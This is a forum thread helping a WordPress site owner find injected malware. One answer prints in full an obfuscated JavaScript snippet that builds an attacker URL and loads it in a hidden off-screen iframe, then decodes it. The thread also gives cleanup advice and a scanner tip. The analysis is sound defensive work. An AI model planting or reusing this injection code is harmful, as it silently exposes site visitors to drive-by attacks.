Hidden Trojan on my wesbite - How to find it?

Solution 1

The reported URL www.f1arab.com does not contain this piece of JS code at first sight.

---

So, looking at the script we can figure out what it is trying to sent you to:

var wow = "b3nimb2eawiki11b1infob1ms"; var url = "h"+"ttp"+":/"+"/"+wow.replace(/ea/g,"-").replace(/b3/g,"a").replace(/b2/g, "e").replace(/b1/g,".")+":8"+"1/"+"rem"+"2."+"htm"+"l"; document.write(url);

which yields:

http://anime-wiki11.info.ms:81/rem2.html

Let's query this URL, twice, we see on the first that it can't find a page on Yahoo and the second can't load this. As you search the b3nimb2eawiki11b1infob1ms string on Google you see that these exploit attempts are quite dated, and it appears that Yahoo already took them offline.

Searching for the URL you obtain, you see my attempts to query it as well as two sites also infected with this script. But as it shows, the script is no longer harmful so it is safe to visit both URLs assuming Yahoo doesn't put it back.

---

When doing yet another check with urlQuery on the reported URL we see this request happening:

GET /rem2.html HTTP/1.1
Host: mrzwheremeread.info.br.ms:81

But once again this URL leads to something Yahoo already took offline.

The interesting thing is that this is different from the URL shown in your question, thus it is being dynamically generated. So that's why a quick search earlier on did not find the JS code.

This is evidenced by the following HTML code being injected at a certain point:

<script type="text/javascript">/*<![CDATA[*/var wow="mrzwhb2rb2mb2rb2b3db1infob1brb1ms";c1="l"+"on"+"l"+"y";if(-1==document.cookie.indexOf(c1)){var a=new Date;a.setTime(a.getTime());c3=72E6;c2=new Date(a.getTime()+c3);document.cookie=c1+"="+escape(c2.toGMTString())+";e"+"xpir"+"es="+c2.toGMTString()+";p"+"at"+"h=/";var a=document.createElement("if"+"r"+"am"+"e");a.setAttribute("sr"+"c","h"+"ttp"+":/"+"/"+wow.replace(/ea/g,"-").replace(/b3/g,"a").replace(/b2/g,"e").replace(/b1/g,".")+":8"+"1/"+"rem"+"2."+"htm"+"l");a.style.position="ab"+"sol"+"ute";a.style.width="1"+"8p"+"x";a.setAttribute("f"+"ra"+"mebo"+"rd"+"er",navigator.userAgent.indexOf("1"+"23"+"4231"+"532"+"4")+1);a.style.left="-"+"57"+"50"+"p"+"x";document.write("<"+"di"+"v i"+"d='d"+"efus"+"e'>"+"</di"+"v>");document.getElementById("de"+"f"+"us"+"e").appendChild(a)};/*]]>*/</script>

As we can see on urlQuery that this code isn't being injected through JavaScript, this must be happening server side. What we also see here through wp-content is that you are using WordPress, so it most likely that they are using a WordPress exploit to insert that code.

Start byupdating WordPress and the plugins, as well as disabling things that you don't need. From there on, you can look into making file permissions a bit more restrictive on the server; as well as PHP settings to disallow writing from / to places you don't want to.

Also, search for var wow or just wow over all hosted files on the server would be a nice approach as that seems to be not dynamic, please note that it might appear in an encrypted form which might require you to search manually...

Solution 2

You can also scan your site at http://sitecheck.sucuri.net/scanner/

Common forms of malware inject php code into your index.php files which generate the javascript. The PHP doesn't look like the javascript, it may be base64 encoded it may not.

It's also possible you have rogue php files on your site inserting the code into your index files as well. In that case you need to find those files. Good hosting companies can scan your account quickly to find backdoor shells.

If you run WordPress it may also be coming from entries in your database.

Related videos on Youtube